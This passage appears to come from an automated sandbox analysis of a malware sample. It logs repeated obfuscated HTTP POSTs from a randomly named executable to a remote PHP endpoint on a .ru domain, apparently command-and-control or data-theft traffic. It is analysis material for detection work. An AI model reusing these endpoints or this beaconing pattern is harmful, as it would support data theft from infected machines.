125 | 192.168.2.4 | 50132 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:40.901882887 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:41.259690046 CET | 1072 | OUT | Data Raw: 55 50 5d 51 5f 5c 51 5a 55 5a 54 59 51 5d 55 5c 58 53 5c 54 59 55 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]Q_\QZUZTYQ]U\XS\TYURZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<)X4"1.)).7Z3$-94$Y"0?_-> ]<(U*#^!'^)?
Jan 1, 2025 15:03:41.403414011 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:41.667954922 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dvs6zxibhEErBja0jhWKrckuKHTqYe45%2Fkx60Wyq%2F9KyOr3U2x0sWKCA2qMdLL8BfPHbUhYrrRlG4o7wRFehY5EX4ufj1zLSBg1%2FtQro0hU6%2FFDGsUMukwDu6%2BbmLR8VoYAAKrjU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ddf7ce8422e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4893&min_rtt=1773&rtt_var=6906&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=54601&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  126 | 192.168.2.4 | 50133 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:41.794842005 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:42.150074959 CET | 1064 | OUT | Data Raw: 55 52 58 5d 5f 5c 51 5b 55 5a 54 59 51 5b 55 51 58 53 5c 5f 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: URX]_\Q[UZTYQ[UQXS\_Y\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <,>7;%X&")./_&72940/U0<8/- ^(>(<#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:42.269618988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:42.438977957 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nz4zPgOIT82Il3JXCKgXa9A0MlCU51AJ339tWkac41pP%2Bcol2TEytx2Drzo%2FQrdngK6Qydi1fyn1DCwIHRL4ap1sG3KjuRjHrVbTLtIQbqNX7%2BRp%2FP6SMZ7CYqZIgPSeEEFj74Um"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30de4d8bfef9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4239&min_rtt=1956&rtt_var=5300&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=72187&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  127 | 192.168.2.4 | 50134 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:42.560156107 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:42.915725946 CET | 1072 | OUT | Data Raw: 55 5e 5d 57 5a 5e 51 5e 55 5a 54 59 51 52 55 53 58 5a 5c 5b 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]WZ^Q^UZTYQRUSXZ\[YWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?1Z4;91>])=,0.P-+310?3;X(<>S><#^!'^)
                                                                                                                  Jan 1, 2025 15:03:43.022686958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:43.284756899 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2M6UO3FLEGlTtovYCVr%2BGLIr2hQ5BSGff5cE320pcDK8E%2BbSaBME9Se7WUG7Usvnnm9%2FjiC3BziSkppI4pKTFKJUnQAH%2FK0gSM5eIqpsXw%2FGvIt2ZFAB%2BzhGG8sFZv4zRwpWzwwo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30de99d4bf5f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3589&min_rtt=1693&rtt_var=4428&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=86559&cwnd=90&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  128 | 192.168.2.4 | 50135 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:43.297097921 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:43.650310040 CET | 1796 | OUT | Data Raw: 55 5e 58 51 5f 59 51 5e 55 5a 54 59 51 5c 55 5c 58 5f 5c 5a 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XQ_YQ^UZTYQ\U\X_\ZYPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]+"#(>%=%Y>_$=9(\%/' /4_<0><#^!'^)
                                                                                                                  Jan 1, 2025 15:03:43.816695929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:44.072088957 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkfO1XVelpVvBQJQbydtHaX9APHzyi9innhAiX0wUUcexI1%2BLR%2BFSCdQxIB2RyZk%2Bfs5bkioqOdwyTkavx%2F3kw6mWCramY4xM7D%2B4Ft9lyDEYNy1wzGYw2uupP1GB4Ee50RViNID"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dee883dc420-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=1461&rtt_var=5133&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=73722&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 0f 33 28 34 06 3c 2d 2a 5b 3b 3f 2f 55 25 2c 26 5d 30 30 38 1d 31 3d 35 5c 2f 38 23 02 3e 2b 0e 02 32 3a 25 5a 37 08 35 04 31 36 2e 5d 04 1d 25 5b 3d 04 25 07 3f 01 31 5b 3e 32 23 00 24 19 05 5a 26 42 2c 5d 30 5b 26 11 22 54 20 0d 27 30 2f 0f 2a 3a 2c 07 33 03 2e 57 20 2a 2e 57 0d 12 21 0d 24 3d 39 57 28 21 2c 54 20 2c 2f 56 25 3f 37 13 30 3f 3c 51 20 2b 2d 0d 29 3f 33 01 23 27 3d 12 27 2a 23 58 22 00 25 10 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!3(4<-*[;?/U%,&]0081=5\/8#>+2:%Z7516.]%[=%?1[>2#$Z&B,]0[&"T '0/*:,3.W *.W!$=9W(!,T ,/V%?70?<Q +-)?3#'='*#X"%"3"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  129 | 192.168.2.4 | 50136 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:43.419739962 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:43.775266886 CET | 1064 | OUT | Data Raw: 55 52 5d 54 5a 5c 54 5a 55 5a 54 59 51 5b 55 54 58 5f 5c 54 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ\TZUZTYQ[UTX_\TYRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y<-Z41X2:(.&4%,';3Y>W$,?,,_<-<U)<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:43.888803959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:44.147690058 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iefMmNs8gBXDpwEQ3dKuSrls7e7PuaaHltWsCM1IQ0rC39%2BVAqM%2FNGTC2tWfzyYxZy122h1371Mzw6q1Zm3BHH%2FPDsiH8pCfmoPnHA1ACvIJAhhTbU2Wz%2FisQsdHds1xgYR9dbop"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30def0e56438b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4438&min_rtt=1943&rtt_var=5719&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=66648&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  130 | 192.168.2.4 | 50137 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:44.293665886 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:44.650079012 CET | 1064 | OUT | Data Raw: 55 54 58 56 5a 5c 54 5d 55 5a 54 59 51 5b 55 53 58 53 5c 5d 59 55 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXVZ\T]UZTYQ[USXS\]YURX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?1X72)>?Y'1:B$0.V$,<->^<- *<#^!'^)?
                                                                                                                  Jan 1, 2025 15:03:44.801189899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:45.077981949 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjUBBbS4ZMguq0nsIAr1ts53pLl41mVLw5ybA0jF3RyRiVyiYJD2x%2B05DqdFB6o5LWTUD2CmlueRNWQMrZfY9y39RIsxuubEBiPxAuXJPvv7QlRHAyIoM%2BjwGLcYA170EbEOETlS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30df4ae8280cd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=19908&min_rtt=14999&rtt_var=15444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=26899&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  131 | 192.168.2.4 | 50138 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:45.302001953 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:45.650285006 CET | 1072 | OUT | Data Raw: 50 54 5d 56 5a 5f 51 5d 55 5a 54 59 51 5e 55 5d 58 5d 5c 5d 59 54 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PT]VZ_Q]UZTYQ^U]X]\]YTR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#()Z ]>1=6*>^'7-.#0,10Z8,[==7)#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:45.748789072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:46.026624918 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ub6LXQ5RhjFaSaO5ewQBtJNeCVtkA3qMt22IsaTs12pc5e8EkDQuWmq76gjmHCqBvMgOY7aCgEALyWjYYrORnOLN1NPYEGaXKjocsP3VYOEy8oH22GGGexd7CE1zJxVDw2E%2B1omv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dfaac1f42b1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4075&min_rtt=1679&rtt_var=5422&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=70027&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  132 | 192.168.2.4 | 50139 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:46.201767921 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:46.556404114 CET | 1072 | OUT | Data Raw: 55 55 5d 50 5f 5d 51 58 55 5a 54 59 51 58 55 56 58 53 5c 58 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]P_]QXUZTYQXUVXS\XYQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+7%X&=>/Y3$9$Y60/. \+=(S*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:46.649022102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:46.824738979 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOyccrSCDAuhgZm%2Fj%2BoMd9tQEP6zEpuYqdyT4%2FYRpCLJPkc7cvlusquRo%2Fo%2BLUMhXtuCUWYGwLd7jIKtmZtm%2F38Yle%2FfKRWl0grnaEzxrOJPAz0xWaUOlzfJ12Bzmtl%2BYP9f0Os5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e004e44437b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1770&rtt_var=699&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=763997&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  133 | 192.168.2.4 | 50140 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:46.954082012 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:47.306441069 CET | 1072 | OUT | Data Raw: 50 56 58 56 5f 5b 51 5c 55 5a 54 59 51 5c 55 56 58 53 5c 55 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXV_[Q\UZTYQ\UVXS\UYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<,!78>$=%X) '"T:_%/$Z 8-8]=. R)<#^!'^)
